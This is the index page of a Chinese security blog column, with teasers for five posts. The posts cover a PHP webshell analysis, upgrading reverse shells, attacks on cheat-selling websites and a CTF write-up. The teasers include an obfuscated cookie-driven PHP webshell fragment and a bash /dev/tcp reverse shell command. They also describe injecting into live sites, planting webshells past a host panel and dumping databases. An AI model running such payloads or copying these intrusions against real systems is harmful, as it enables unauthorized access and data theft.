技术文章
关注
分享
扫一扫
yzddMr6
yzddmr6.tk
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
一个有趣的Shell分析以及自己的一些想法 ——yzddMr6
前言前一段时间有很多同学问我这个shell,看了下确实比较有意思,并且顺便也想讲一些自己的想法。<?php$p=$_COOKIE;(count($p)==23&&in_array(gettype($p).count($p),$p))?(($p[59]=$p[59].$p[72])&&($p[91]=$p[59]($p[91]))&&($p...原创 2019-12-17 22:07:01 · 500 阅读 · 1 评论 -
反弹Shell升级为交互式Shell ——yzddMr6
前言看hack the box的视频的时候,发现ippsec不喜欢用蚁剑,喜欢弹个shell回来。然后一顿操作把一个简单的shell就升级到了一个标准交互式shell写这篇文章记录一下正文攻击机:kali靶机:ubuntu首先ubuntu建一个新用户:test,密码 test普通Shell给kali弹shellbash -i >& /dev/tcp/192.168...原创 2019-12-03 13:14:56 · 2624 阅读 · 0 评论 -
向吃鸡外挂站开炮(二)——yzddMr6
上一篇 向吃鸡外挂站开炮(一)前言首先打开网站我们可以看到他的炫酷界面暖心公告[图片上传失败…(image-cea3c9-1573117670522)]不要脸的宣传词发现注入基于tp3开发,后台/admin尝试万能密码提示密码错误尝试admin admin888 提示账号不存在两者回显不同,考虑可能存在注入无法利用?burp抓包发送到repeater进行...原创 2019-11-15 15:36:30 · 361 阅读 · 0 评论 -
向吃鸡外挂站开炮(一) ——yzddMr6
前言因为最近吃鸡被外挂打自闭了,所以准备也让那些卖挂的体会一下什么叫做自闭。昨天晚上爬了快1000个卖吃鸡外挂的平台你们这些卖挂的,等我有空了一个一个捶。发现大多数都是用的一套aspx的程序,可惜没有源码不能白盒审计,黑盒也找不到什么洞只能找找软柿子捏昨天晚上一口气锤了四个基本上都有宝塔不过php-venom 4 系列加上配套的编码器过宝塔稳得一批脱了裤子发现里面...原创 2019-11-15 15:34:53 · 1038 阅读 · 0 评论 -
2019“黄鹤杯”全国总决赛 WEB Write Up ——yzddMr6
前言三天赶了两场比赛黄鹤杯体验极佳 ,比某500空间好到不知哪里去了web就两个题,一开始就打穿了于是本菜鸡就开始了划水运动hhhhhweb1web1是个thinkphp5扫一下目录有个www.zip打开后看到源码image有注册 有登录按钮,然后看源码的意思是让你成为admin用户,然后可以得到一个hint来进行下一步...原创 2019-11-09 19:36:48 · 711 阅读 · 0 评论